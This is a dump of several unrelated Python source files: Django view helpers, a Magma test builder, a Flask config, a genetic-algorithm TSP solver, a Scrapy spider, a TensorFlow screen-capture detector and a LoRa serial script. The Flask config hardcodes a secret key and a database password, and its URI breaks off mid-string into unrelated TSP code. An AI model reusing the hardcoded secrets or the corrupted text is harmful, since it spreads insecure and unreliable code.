getattr(view.model,name).fget.__annotations__\n if \"return\" in annotations:\n return_type = annotations[\"return\"]\n if (isListType(return_type) and ODF & odf.list) or (not isListType(return_type) and ODF & odf.flat):\n properties.append(name)\n else:\n properties.append(name)\n else:\n properties.append(name)\n\n # List properties_methods, but respect the format request (list and flat selectors) \n # Look for property_methods (those decorated with property_method and having defaults for all parameters)\n property_methods = []\n if ODF & odf.methods:\n for method in inspect.getmembers(view.obj, predicate=is_property_method):\n name = method[0]\n if hasattr(getattr(view.model,name), \"__annotations__\"):\n annotations = getattr(view.model,name).__annotations__\n if \"return\" in annotations:\n return_type = annotations[\"return\"]\n if (isListType(return_type) and ODF & odf.list) or (not isListType(return_type) and ODF & odf.flat):\n property_methods.append(name)\n else:\n property_methods.append(name)\n\n # List summaries (these are always flat) \n summaries = []\n if ODF & odf.summaries:\n for summary in summary_methods:\n if hasattr(view.model, summary) and callable(getattr(view.model, summary)):\n summaries.append(summary)\n\n # Define some (empty) buckets for all the fields so we can group them on \n # display (by model, internal, related, property, scalars and lists)\n if ODF & odf.flat:\n view.fields_flat = {} # Fields that have scalar values\n view.all_fields_flat = collections.OrderedDict()\n if ODF & odf.model:\n view.fields_flat[odf.model] = collections.OrderedDict()\n if ODF & odf.internal:\n view.fields_flat[odf.internal] = collections.OrderedDict()\n if ODF & odf.related:\n view.fields_flat[odf.related] = collections.OrderedDict()\n if ODF & odf.properties:\n view.fields_flat[odf.properties] = collections.OrderedDict()\n if ODF & odf.methods:\n view.fields_flat[odf.methods] = collections.OrderedDict()\n if ODF & odf.summaries:\n view.fields_flat[odf.summaries] = collections.OrderedDict()\n\n if ODF & odf.list:\n view.fields_list = {} # Fields that are list items (have multiple values)\n view.all_fields_list = collections.OrderedDict()\n if ODF & odf.model:\n view.fields_list[odf.model] = collections.OrderedDict()\n if ODF & odf.internal:\n view.fields_list[odf.internal] = collections.OrderedDict()\n if ODF & odf.related:\n view.fields_list[odf.related] = collections.OrderedDict()\n if ODF & odf.properties:\n view.fields_list[odf.properties] = collections.OrderedDict()\n if ODF & odf.methods:\n view.fields_list[odf.methods] = collections.OrderedDict()\n if ODF & odf.summaries:\n view.fields_list[odf.summaries] = collections.OrderedDict()\n\n # For all fields we've collected set the value and label properly\n # Problem is that relationship fields are by default listed by primary keys (pk)\n # and we want to fetch the actual string representation of that reference an save \n # that not the pk. The question is which string (see object_list_format() for the\n # types of string we support).\n for field in all_fields:\n # All fields in other models that point to this one should have an is_relation flag\n\n # These are the field types we can expect:\n # flat\n # simple: a simple database field in this model\n # many_to_one: this is a ForeignKey field pointing to another model\n # one_to_one: this is a OneToOneField\n # list:\n # many_to_many: this is a ManyToManyField, so this object could be pointing at many making a list of items\n # one_to_many this is an _set field (i.e. has a ForeignKey in another model pointing to this model and this field is the RelatedManager)\n #\n # We want to build a fields dictionaries here with field values\n # There are two types of field_value we'd like to report in the result:\n # flat values: fields_flat contains these\n # if the field is scalar, just its value\n # if the field is a relation (a foreign object) its string representation\n # list values: fields_list contains these\n # if the field is a relation to many objects, a list of their string representations\n #\n # We also build fields_model and fields_other\n\n print_debug(f\"Collecting Rich Object Field: {field.name}\")\n bucket = (odf.model if field.name in model_fields\n else odf.internal if field.name in internal_fields\n else odf.related if field.name in related_fields\n else None)\n\n if not bucket is None:\n if is_list(field):\n if ODF & odf.list:\n attname = field.name if hasattr(field,'attname') else field.name+'_set' if field.related_name is None else field.related_name # If it's a model field it has an attname attribute, else it's a _set atttribute\n \n field.is_list = True\n field.label = safetitle(attname.replace('_', ' '))\n \n ros = apply_sort_by(getattr(view.obj, attname).all())\n \n if len(ros) > 0:\n field.value = [odm_str(item, view.format.mode) for item in ros]\n else:\n field.value = NONE\n \n view.fields_list[bucket][field.name] = field\n elif is_bitfield(field):\n if ODF & odf.flat:\n flags = []\n for f in field.flags:\n bit = getattr(getattr(view.obj, field.name), f)\n if bit.is_set:\n flags.append(getattr(view.obj, field.name).get_label(f))\n field.is_list = False\n field.label = safetitle(field.verbose_name)\n \n if len(flags) > 0:\n field.value = odm_str(\", \".join(flags), view.format.mode)\n else:\n field.value = NONE\n \n view.fields_flat[bucket][field.name] = field\n else:\n if ODF & odf.flat:\n field.is_list = False\n field.label = safetitle(field.verbose_name)\n \n field.value = odm_str(getattr(view.obj, field.name), view.format.mode)\n if not str(field.value):\n field.value = NOT_SPECIFIED\n \n view.fields_flat[bucket][field.name] = field\n\n # Capture all the property, property_method and summary values as needed (these are not fields)\n if ODF & odf.properties or ODF & odf.methods or ODF & odf.summaries:\n names = []\n if ODF & odf.properties:\n names += properties\n if ODF & odf.methods:\n names += property_methods\n if ODF & odf.summaries:\n names += summaries\n \n for name in names:\n print_debug(f\"Collecting Rich Object Property: {name}\")\n label = safetitle(name.replace('_', ' '))\n \n # property_methods and summaries are functions, and properties are attributes\n # so we have to fetch their values appropriately \n if name in property_methods:\n value = getattr(view.obj, name)()\n bucket = odf.methods\n elif name in summaries:\n value = getattr(view.obj, name)()\n bucket = odf.summaries\n else:\n value = getattr(view.obj, name)\n bucket = odf.properties\n \n if not str(value):\n value = NOT_SPECIFIED\n \n p = models.Field()\n p.label = label\n \n if isListValue(value):\n if ODF & odf.list:\n p.is_list = True\n \n if len(value) == 0:\n p.value = NONE\n elif isDictionary(value):\n # Value becomes Key: Value\n p.value = [f\"{odm_str(k, view.format.mode)}: {odm_str(v, view.format.mode)}\" for k, v in dict.items(value)] \n else:\n p.value = [odm_str(val, view.format.mode) for val in list(value)] \n view.fields_list[bucket][name] = p\n else:\n if ODF & odf.flat:\n p.is_list = False\n p.value = odm_str(value, view.format.mode, True) \n view.fields_flat[bucket][name] = p\n \n # Some more buckets to put the fields in so we can separate lists of fields on display\n view.fields = collections.OrderedDict() # All fields\n view.fields_bucketed = collections.OrderedDict()\n\n buckets = [] \n if ODF & odf.summaries: # Put Summaries at top if they are requested\n view.fields_bucketed[odf.summaries] = collections.OrderedDict()\n buckets += [odf.summaries]\n if ODF & odf.model:\n view.fields_bucketed[odf.model] = collections.OrderedDict()\n buckets += [odf.model]\n if ODF & odf.internal:\n view.fields_bucketed[odf.internal] = collections.OrderedDict()\n buckets += [odf.internal]\n if ODF & odf.related:\n view.fields_bucketed[odf.related] = collections.OrderedDict()\n buckets += [odf.related]\n if ODF & odf.properties:\n view.fields_bucketed[odf.properties] = collections.OrderedDict()\n buckets += [odf.properties]\n if ODF & odf.methods:\n view.fields_bucketed[odf.methods] = collections.OrderedDict()\n buckets += [odf.methods]\n\n for bucket in buckets:\n passes = []\n if ODF & odf.flat:\n passes += [True]\n if ODF & odf.list:\n passes += [False]\n for Pass in passes:\n field_list = view.fields_flat[bucket] if Pass else view.fields_list[bucket]\n for name, value in field_list.items():\n view.fields_bucketed[bucket][name] = value\n view.fields[name] = value\n\nclass TimeZoneMixIn(models.Model):\n '''\n An abstract model that ensures timezone data is saved with all DateTimeField's that have \n a CharField of same name with _tz appended by placing the currentlya ctive Django timezone\n name into that field.\n '''\n \n def update_timezone_fields(self):\n '''\n Update the timezone fields that accompany any DateTimeFields \n '''\n \n for field in self._meta.concrete_fields:\n if isinstance(field, models.DateTimeField):\n tzfieldname = f\"{field.name}_tz\"\n if hasattr(self, tzfieldname):\n setattr(self, tzfieldname, str(get_current_timezone()))\n \n def save(self, *args, **kwargs):\n self.update_timezone_fields()\n super().save(*args, **kwargs)\n\n class Meta:\n abstract = True\n \n","sub_path":"django_generic_view_extensions/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":26586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"370213601","text":"\"\"\"\nCopyright (c) 2016-present, Facebook, Inc.\nAll rights reserved.\n\nThis source code is licensed under the BSD-style license found in the\nLICENSE file in the root directory of this source tree. An additional grant\nof patent rights can be found in the PATENTS file in the same directory.\n\"\"\"\n\nimport asyncio\nfrom unittest import mock\nfrom magma.common.service import MagmaService\nfrom magma.enodebd.devices.device_map import get_device_handler_from_name\nfrom magma.enodebd.devices.device_utils import EnodebDeviceName\nfrom magma.enodebd.state_machines.enb_acs import EnodebAcsStateMachine\nfrom magma.enodebd.stats_manager import StatsManager\nfrom magma.enodebd.tests.test_utils.config_builder import EnodebConfigBuilder\n\n\nclass EnodebAcsStateMachineBuilder:\n @classmethod\n def build_acs_state_machine(\n cls,\n device: EnodebDeviceName = EnodebDeviceName.BAICELLS,\n ) -> EnodebAcsStateMachine:\n # Build the state_machine\n stats_mgr = StatsManager()\n service = cls.build_magma_service(device)\n handler_class = get_device_handler_from_name(device)\n acs_state_machine = handler_class(service, stats_mgr)\n return acs_state_machine\n\n @classmethod\n def build_magma_service(\n cls,\n device: EnodebDeviceName = EnodebDeviceName.BAICELLS,\n ) -> MagmaService:\n event_loop = asyncio.get_event_loop()\n mconfig = EnodebConfigBuilder.get_mconfig(device)\n service_config = EnodebConfigBuilder.get_service_config()\n with mock.patch('magma.common.service.MagmaService') as MockService:\n MockService.config = service_config\n MockService.mconfig = mconfig\n MockService.loop = event_loop\n return MockService\n","sub_path":"lte/gateway/python/magma/enodebd/tests/test_utils/enb_acs_builder.py","file_name":"enb_acs_builder.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"370421146","text":"import os\nbasedir = os.path.abspath(os.path.dirname(__file__))\n\nclass Config(object):\n DEBUG = False\n TESTING = False\n SECRET_KEY = 'notejam-flask-secret-key'\n CSRF_ENABLED = True\n CSRF_SESSION_KEY = 'notejam-flask-secret-key'\n SQLALCHEMY_DATABASE_URI = 'mysql://notejam:tYoSZlT&Bf^YLn ind_i.getFitness():\n self.best = ind_i.copy()\n print (\"Best initial sol: \",self.best.getFitness())\n\n def updateBest(self, candidate):\n if self.best == None or candidate.getFitness() < self.best.getFitness():\n self.best = candidate.copy()\n print (\"iteration: \",self.iteration, \"best: \",self.best.getFitness())\n\n def randomSelection(self):\n \"\"\"\n Random (uniform) selection of two individuals\n \"\"\"\n indA = self.matingPool[ random.randint(0, self.popSize-1) ]\n indB = self.matingPool[ random.randint(0, self.popSize-1) ]\n return [indA, indB]\n\n def stochasticUniversalSampling(self):\n # Calculate fitnesses/total fitness\n total_fitness = 0\n fitness_dict = dict()\n count = 0\n # For each individual in the population\n for individual in self.population:\n # Set a lower bound\n lower = total_fitness\n if total_fitness > 0:\n lower += 1\n # Set an upper bound\n upper = total_fitness + individual.getFitness()\n # Add individual to fitness dictionary with value (lower bound,\n # upper bound)\n fitness_dict[count] = (lower, upper, individual)\n # Update total_fitness\n total_fitness += individual.getFitness()\n count += 1\n # For each individual in the dictionary\n for key in fitness_dict:\n # Modify values to be in the range (0, 1)\n fitness_dict[key] = ((fitness_dict[key][0]/total_fitness),\n (fitness_dict[key][1]/total_fitness),\n fitness_dict[key][2])\n # Setting N size\n # SUS will take approx. 2/3 of the current population size\n new_sample = []\n size = ((len(self.population)/3)*2)\n first_point = 1/size\n interval = random.uniform(0, first_point)\n check = 0\n while interval < (1):\n indiv = fitness_dict[check]\n lower = indiv[0]\n upper = indiv[1]\n person = indiv[2]\n if interval <= upper:\n new_sample += [person]\n interval += first_point\n else:\n check += 1\n return new_sample\n \n \n\n def uniformCrossover(self, indA, indB):\n \"\"\"Executes a uniform crossover and returns a new individual\n :param ind1: The first parent (or individual)\n :param ind2: The second parent (or individual)\n :returns: A new individual\"\"\"\n\n child = Individual(self.genSize, self.data)\n\n # Select random parent to inherit initial genes from\n parent = random.randint(0,1)\n parent1 = indA\n parent2 = indB\n if parent == 0:\n parent1 = indB\n parent2 = indA\n\n # Keep track of values already checked\n values_crossed = []\n \n # For each gene in the selected parent\n for i in range(len(parent1.genes)):\n \n # Randomly decide if the current gene is being kept\n cross = random.randint(0,1)\n\n # If the gene is selected:\n if cross == 1:\n\n # Set the child's gene as the same as the parent, and add\n # the value to the tracker\n child.genes[i] = parent1.genes[i]\n values_crossed += [parent1.genes[i]]\n \n else:\n # Otherwise, set the current gene as none\n child.genes[i] = None\n \n j = 0\n i = 0\n # For each gene in the other parent\n while i < len(parent2.genes):\n\n # If the current gene has a value, continue\n if child.genes[i] != None:\n i += 1\n\n # Otherwise\n elif child.genes[i] == None:\n\n # If the current value hasn't been selected previously\n over = parent2.genes[j]\n if over not in values_crossed:\n\n # Add the value to the checked values, and update the child\n # with the new gene\n values_crossed += [over]\n child.genes[i] = over\n i += 1\n # Continue\n j += 1\n return child\n\n def pmxCrossover(self, indA, indB):\n\n\n child = Individual(self.genSize, self.data)\n \n parent1 = indA\n parent2 = indB\n\n # Keep track of values already checked, and their map\n indices_checked = []\n values_checked = []\n value_maps = dict()\n\n index1 = random.randint(0, len(parent1.genes)-1)\n index2 = random.randint(0, len(parent1.genes)-1)\n\n if index2 < index1:\n tmp = index1\n index1 = index2\n index2 = tmp\n\n for i in range(len(parent1.genes)):\n if i < index1:\n child.genes[i] = None\n elif i > index2:\n child.genes[i] = None\n else: #index is between 2 selected\n child.genes[i] = parent1.genes[i]\n indices_checked += [i]\n values_checked += [parent1.genes[i]]\n value_maps[parent1.genes[i]] = [parent2.genes[i]]\n print(child.genes)\n \n while len(indices_checked) > 0:\n \n current = indices_checked[0]\n value1 = parent1.genes[current]\n value2 = parent2.genes[current]\n \n if value1 == value2:\n indices_checked.remove(current)\n \n else:\n \n cur_val2 = parent2.genes.index(value1)\n mapped = value_maps[value1]\n \n while True:\n \n indices_checked.remove(current)\n \n if mapped not in list(value_maps.keys()):\n \n child.genes[cur_val2] = value2\n values_checked += [value2]\n break\n \n mapped = value_maps[mapped]\n \n j = 0\n i = 0\n # For each gene in the other parent\n while i < len(parent2.genes):\n\n # If the current gene has a value, continue\n if child.genes[i] != None:\n i += 1\n\n # Otherwise\n elif child.genes[i] == None:\n\n # If the current value hasn't been selected previously\n over = parent2.genes[j]\n if over not in values_checked:\n\n # Add the value to the checked values, and update the child\n # with the new gene\n values_checked += [over]\n child.genes[i] = over\n i += 1\n # Continue\n j += 1\n return child\n \n def reciprocalExchangeMutation(self, ind):\n # Generate random integer (index of first gene to swap)\n gene1 = random.randint(0, len(ind.genSize))\n\n # Generate random integer (index of second gene to swap)\n gene2 = random.randint(0, len(ind.genSize))\n\n # If both point to the same index, change the second index\n while gene1 == gene2:\n gene2 = random.randint(0, len(ind.genSize))\n\n # Store the value of the gene at the first gene index\n gene_holder = ind.genes[gene1]\n\n # Set the value of the gene at the first gene index to the value of the gene at the second gene index\n ind.genes[gene1] = ind.genes[gene2]\n\n # Set the value of the gene at the first gene index to the value in the gene_holder object\n\n return ind\n\n def inversionMutation(self, ind):\n # Randomly generate an integer (index of one of the swapping points)\n gene1 = None\n gene2 = None\n # If both index points are None or the same, re-generate new index\n # points\n while gene1 == gene2:\n # Randomly generate an integer (index of one of the swapping points)\n gene1 = random.randint(0, ind.genSize-1)\n\n # Randomly generate an integer (index of one of the swapping points)\n gene2 = random.randint(0, ind.genSize-1)\n i = 0\n j = 0\n # If the first number generated is greater than the 2nd, set i = 2nd\n # index generated\n if gene1 > gene2:\n i = gene2\n j = gene1\n else:\n i = gene1\n j = gene2\n \n # Double-ended search\n # While the lower index is less than the higher index:\n while i < j:\n # Store the value of the child's ith gene\n gene_holder = ind.genes[i]\n\n # Replace the value of the child's ith gene with the value in the\n # child's jth gene\n ind.genes[i] = ind.genes[j]\n\n # Replace the value of the child's jth gene with the value in the\n # gene holder (the original value in the child's ith gene)\n ind.genes[j] = gene_holder\n\n #Increment i, decrement j\n i += 1\n j -= 1\n \n return ind\n\n def crossover(self, indA, indB):\n \"\"\"\n Executes a 1 order crossover and returns a new individual\n \"\"\"\n child = []\n tmp = {}\n\n indexA = random.randint(0, self.genSize-1)\n indexB = random.randint(0, self.genSize-1)\n\n for i in range(0, self.genSize):\n if i >= min(indexA, indexB) and i <= max(indexA, indexB):\n tmp[indA.genes[i]] = False\n else:\n tmp[indA.genes[i]] = True\n aux = []\n for i in range(0, self.genSize):\n if not tmp[indB.genes[i]]:\n child.append(indB.genes[i])\n else:\n aux.append(indB.genes[i])\n child += aux\n return child\n\n def mutation(self, ind):\n \"\"\"\n Mutate an individual by swaping two cities with certain probability (i.e., mutation rate)\n \"\"\"\n if random.random() > self.mutationRate:\n return\n indexA = random.randint(0, self.genSize-1)\n indexB = random.randint(0, self.genSize-1)\n\n tmp = ind.genes[indexA]\n ind.genes[indexA] = ind.genes[indexB]\n ind.genes[indexB] = tmp\n\n ind.computeFitness()\n self.updateBest(ind)\n\n def updateMatingPool(self):\n \"\"\"\n Updating the mating pool before creating a new generation\n \"\"\"\n self.matingPool = []\n for ind_i in self.population:\n self.matingPool.append( ind_i.copy() )\n\n def newGeneration(self):\n\n \n \n \"\"\"\n Creating a new generation\n 1. Selection\n 2. Crossover\n 3. Mutation\n \"\"\"\n for i in range(0, len(self.population)):\n\n # Random selection\n indexParent1 = random.randint(0, len(self.matingPool)-1)\n indexParent2 = random.randint(0, len(self.matingPool)-1)\n\n parent1 = self.matingPool[indexParent1]\n parent2 = self.matingPool[indexParent2]\n\n # Uniform crossover\n child = self.uniformCrossover(parent1, parent2)\n\n # Inversion mutation\n child = self.inversionMutation(child)\n\n # Compute fitness\n child.computeFitness()\n \n # Put into population\n self.population[i] = child\n\n # Calculate best\n if child.getFitness() < self.best.getFitness():\n self.best = child\n\n print (\"Best so far =============\")\n print (\"Iteration: \"+str(self.iteration))\n print (\"Cost: \"+str(self.best.getFitness()))\n print (\"=========================\")\n \n \"\"\"\n Depending of your experiment you need to use the most suitable algorithms for:\n 1. Select two candidates\n 2. Apply Crossover\n 3. Apply Mutation\n \"\"\"\n\n def GAStep(self):\n \"\"\"\n One step in the GA main algorithm\n 1. Updating mating pool with current population\n 2. Creating a new Generation\n \"\"\"\n\n self.updateMatingPool()\n self.newGeneration()\n\n def search(self):\n \"\"\"\n General search template.\n Iterates for a given number of steps\n \"\"\"\n self.iteration = 0\n while self.iteration < self.maxIterations:\n self.GAStep()\n self.iteration += 1\n\n print (\"Total iterations: \",self.iteration)\n print (\"Best Solution: \", self.best.getFitness())\n\n\"\"\"if len(sys.argv) < 2:\n print (\"Error - Incorrect input\")\n print (\"Expecting python BasicTSP.py [instance] \")\n sys.exit(0)\n\n\nproblem_file = sys.argv[1]\"\"\"\n\nfor i in range(5):\n ga = BasicTSP(\"inst-13.tsp\", 100, 0.1, 500)\n ga.search()\n print(\"1:\", i, ga.best.getFitness())\n","sub_path":"assignment-1/config1/TSP_R00140363-config1.py","file_name":"TSP_R00140363-config1.py","file_ext":"py","file_size_in_byte":14569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"26060258","text":"import os.path as osp\ncur_dir = osp.dirname(osp.abspath(__file__))\n\nimport yaml\nfrom easydict import EasyDict as edict\nfrom deepcls.mmcls.dataset import MultiClassDataset\n\ndef get_pipeline(pipelines, tp):\n if 'train' in tp:\n p = pipelines['train']\n elif 'val' in tp:\n p = pipelines['val']\n else:\n assert tp == 'test'\n p = pipelines['test']\n return p\n\ndef make_dataset_book(data_root, tp, pipelines, classes, img_size):\n assert tp in ('train', 'val_train', 'val', 'test')\n return MultiClassDataset(\n class_dic=classes,\n ann_file=osp.join(data_root, 'splits'),\n data_prefix=osp.join(data_root, f'images_{img_size[0]}x'),\n pipeline=get_pipeline(pipelines, tp),\n tp=tp,\n )\n\n\nbook_class_dic = yaml.safe_load(open(osp.join(cur_dir, 'tasks.yaml')))['class_dic']\n\nDATASETS = edict({\n 'book': {\n 'classes': book_class_dic,\n 'data_root': 'books/',\n 'img_size': (512, 512),\n 'make_dataset': make_dataset_book,\n }\n})\n\nif __name__ == \"__main__\":\n ds = make_dataset_book('../data/books', 'train', {'train': []}, {}, (1024, 1024))\n\n ds.load_annotations()\n","sub_path":"bookrecog_server/samples/model_datasets.py","file_name":"model_datasets.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"395204863","text":"from exceptions import IndexError\nimport datetime\n\nfrom scrapy.http import Request\nfrom scrapy.spider import Spider\nfrom scrapy.selector import Selector\n\nfrom rdf.items import FestivalItem\nfrom rdf.settings import GOOGLE_API_KEY\n\nfrom gf.models import Festival\nfrom gf.models import Location\nfrom gf.models import Artist\nfrom gf.models import Day\n\nclass SpiderSpider(Spider):\n name = \"spider\"\n base_url = u'http://www.routedesfestivals.com'\n start_urls = [\n \"http://www.routedesfestivals.com/les-festivals-pour-Mai/2014-05.html\",\n \"http://www.routedesfestivals.com/les-festivals-pour-Juin/2014-06.html\",\n \"http://www.routedesfestivals.com/les-festivals-pour-Juillet/2014-07.html\",\n \"http://www.routedesfestivals.com/les-festivals-pour-Aout/2014-08.html\",\n \"http://www.routedesfestivals.com/les-festivals-pour-Septembre/2014-09.html\",\n \"http://www.routedesfestivals.com/les-festivals-pour-Novembre/2014-11.html\",\n \"http://www.routedesfestivals.com/les-festivals-pour-Decembre/2014-12.html\",\n ]\n\n georeverse_url = 'https://maps.googleapis.com/maps/api/geocode/xml?sensor=false&language=fr&key='+GOOGLE_API_KEY+'&address='\n\n def parse(self, response):\n sel = Selector(response);\n festivals = sel.xpath('//ul[@id=\"festListe\"]/li/ul/li')\n for f in festivals:\n name = f.xpath('*/a[@class=\"nameList\"]')\n extracted_name = name.xpath('text()')[0].extract().title()\n festival = self.get_festival_item_from_name(extracted_name)\n festival['name'] = extracted_name\n fest_url = name.xpath('@href')[0].extract()\n if 'location' not in festival:\n # Test and skip festival without location\n try:\n f.xpath('*/a[@class=\"villeList\"]/text()')[0]\n except IndexError:\n continue\n location_request = self.parse_location(f.xpath('*/a[@class=\"villeList\"]/text()'), festival)\n if location_request is not None:\n yield location_request\n request = Request(self.base_url+fest_url, callback=self.parse_festival)\n request.meta['festival'] = festival\n yield request\n\n next = sel.xpath('//a[@class=\"suivant\"]/@href').extract()\n if len(next):\n yield Request(self.base_url+next[0], callback=self.parse)\n\n def parse_location(self, l, festival):\n location = Location()\n location.city = l[0].extract()\n brackets = l[1].extract()\n if(brackets.isnumeric()):\n location.dpt_code = brackets\n location.country = 'France'\n else:\n location.country = brackets\n location.dpt_code = '0'\n \n db_location = Location.objects.filter(city = location.city, country = location.country, dpt_code = location.dpt_code)\n request = None\n if db_location:\n festival['location'] = db_location[0]\n else:\n location.save()\n location_list = [location.city.replace(' ','+')]\n if(location.dpt_code != '000'):\n location_list.append(location.dpt_code.replace(' ','+'))\n location_list.append(location.country.replace(' ','+'))\n concat_location = ','.join(location_list)\n request = Request(self.georeverse_url+concat_location, callback = self.geocoding_callback)\n request.meta['location_id'] = location.id\n festival['location'] = location\n return request\n \n \n def geocoding_callback(self, response):\n location = Location.objects.filter(id = response.meta['location_id'])[0]\n sel = Selector(response)\n try:\n location.dpt = sel.xpath('//address_component/type[text()=\"administrative_area_level_2\"]/preceding-sibling::long_name/text()')[0].extract()\n except IndexError:\n pass\n try:\n location.region = sel.xpath('//address_component/type[text()=\"administrative_area_level_1\"]/preceding-sibling::long_name/text()')[0].extract()\n except IndexError:\n pass\n location.lat = sel.xpath('//geometry/location/lat/text()')[0].extract()\n location.lng = sel.xpath('//geometry/location/lng/text()')[0].extract()\n location.save()\n\n def parse_festival(self, response):\n '''\n Parse festival page to get details\n '''\n sel = Selector(response)\n festival = response.meta['festival']\n festival['website'] = response.url\n try:\n festival['image_url'] = sel.xpath('//a[@class=\"image_presentation\"]/@href')[0].extract()\n except IndexError:\n pass\n django_festival = festival.save()\n days = sel.xpath('//ul[@class=\"liste_concerts\"]/li[@class=\"fest\"]')\n day_list = []\n for da in days:\n day = Day()\n day.festival = django_festival\n try:\n date = da.xpath('time/@datetime')[0].extract()\n day.date = datetime.datetime.strptime(date, '%Y-%m-%dT%H:%M:%S').date()\n except IndexError:\n continue\n db_day = Day.objects.filter(date=day.date, festival = django_festival)\n if db_day:\n day = db_day[0]\n else:\n day.save()\n artists = da.xpath('span[@class=\"info_fest\"]//a[@class=\"artiste\"]/text()')\n for a in artists:\n artist = Artist()\n artist.name = a.extract().title()\n db_artist = Artist.objects.filter(name=artist.name)\n if db_artist:\n day.artists.add(db_artist[0])\n else:\n artist.save()\n day.artists.add(artist)\n day_list.append(day)\n day_list.sort(key = lambda day: day.date)\n try:\n festival['begin_date'] = day_list[0].date\n festival.instance.begin_date = festival['begin_date']\n festival['end_date'] = day_list[-1].date\n festival.instance.end_date = festival['end_date']\n except IndexError:\n pass\n \n return festival\n\n def get_festival_item_from_name(self, name):\n query_result = Festival.objects.filter(name=name)\n fest_item = FestivalItem()\n if query_result:\n fest_item._instance = query_result[0]\n fest_item['name'] = query_result[0].name\n fest_item['location'] = query_result[0].location\n fest_item['end_date'] = query_result[0].end_date\n fest_item['begin_date'] = query_result[0].begin_date\n fest_item['website'] = query_result[0].website\n fest_item['total_price'] = query_result[0].total_price\n else:\n fest_item['name'] = name\n return fest_item\n","sub_path":"rdf/rdf/spiders/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":6885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"113842411","text":"import numpy as np\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\nimport mss\n\nfrom collections import defaultdict\nfrom io import StringIO\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\n\n\nimport cv2\n\nsys.path.append(\"..\")\n\nfrom utils import label_map_util\n\nfrom utils import visualization_utils as vis_util\n\nMODEL_NAME = 'faster_inference_graph'\n\nPATH_TO_CKPT = MODEL_NAME + '/frozen_inference_graph.pb'\n\n# List of the strings that is used to add correct label for each box.\nPATH_TO_LABELS = os.path.join('data', 'object-detection.pbtxt')\n\nNUM_CLASSES = 3\n\ndetection_graph = tf.Graph()\nwith detection_graph.as_default():\n od_graph_def = tf.GraphDef()\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\n serialized_graph = fid.read()\n od_graph_def.ParseFromString(serialized_graph)\n tf.import_graph_def(od_graph_def, name='')\n\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\ncategory_index = label_map_util.create_category_index(categories)\n\ndef load_image_into_numpy_array(image):\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n\n\nwith detection_graph.as_default():\n with tf.Session(graph=detection_graph) as sess:\n while True:\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n monitor = {'top': 0, 'left': 0, 'width': 960, 'height': 540}\n pix = mss.mss().grab(monitor)\n image = Image.frombytes('RGB', pix.size, pix.rgb)\n #image = Image.open(imagename)\n image_np = load_image_into_numpy_array(image)\n \n image_np_expanded = np.expand_dims(image_np, axis=0)\n image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\n # Each box represents a part of the image where a particular object was detected.\n boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n scores = detection_graph.get_tensor_by_name('detection_scores:0')\n classes = detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = detection_graph.get_tensor_by_name('num_detections:0')\n # Actual detection.\n (boxes, scores, classes, num_detections) = sess.run(\n [boxes, scores, classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n width = 960\n height = 540\n ymin = boxes[0][0][0]*height\n xmin = boxes[0][0][1]*width\n ymax = boxes[0][0][2]*height\n xmax = boxes[0][0][3]*width\n print(ymin)\n print(xmin)\n print(ymax)\n print(xmax) \n\n objects = []\n for index, value in enumerate(classes[0]):\n object_dict = {}\n if scores[0, index] > 0.5:\n object_dict[(category_index.get(value)).get('name').encode('utf8')] = \\\n scores[0, index]\n objects.append(object_dict)\n print(objects)\n\n # Visualization of the results of a detection.\n #vis_util.visualize_boxes_and_labels_on_image_array(\n # image_np,\n # np.squeeze(boxes),\n # np.squeeze(classes).astype(np.int32),\n # np.squeeze(scores),\n # category_index,\n # use_normalized_coordinates=True,\n # line_thickness=8)\n\n # cv2.imshow('object detection', cv2.resize(image_np, (400,300)))\n # if cv2.waitKey(25) & 0xFF == ord('q'):\n # cv2.destroyAllWindows()\n # break\n","sub_path":"research/object_detection/webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"582115946","text":"# www.ifroglab.com\n# -*- coding: utf8 -*-\n# coding=UTF-8\n# * iFrogLab IL-LORA1272 www.ifroglab.com\n# *\n# * 功能, USB to TTL , IFROGLAB LORA\n# * 電源VDD, 3.3V ,Pin 3\n# * 接地GND, GND ,Pin 1\n# * 接收反應Host_IRQ, null , Pin 2\n# * UART, RX ,UART_RX Pin 7\n# * UART, TX ,UART_TX Pin 8\n\nimport ifroglab\nimport time\nimport serial\n\ndef Fun_CRC(data):\n crc=0\n for i in data:\n crc=crc^i\n return crc\n\nLoRa = ifroglab.LoRa()\n\n\n# 找最後一個USB UART 設備\nprint(\"List All Ports, serial_ports()\")\nserPorts=LoRa.serial_allPorts()\nprint(serPorts)\nportName=serPorts[-1]\n\n\n# 打開Port\nprint(\"Open Port, FunLora_init()\")\nser=LoRa.FunLora_initByName(portName)\n\n\n#讀取F/W版本及Chip ID\nprint(\"Get Firmware Version, FunLora_0_GetChipID()\")\nLoRa.FunLora_0_GetChipID()\n\n# 重置 & 初始化\nprint(\"Init, FunLora_1_Init()\")\nLoRa.FunLora_1_Init()\n\n\n# 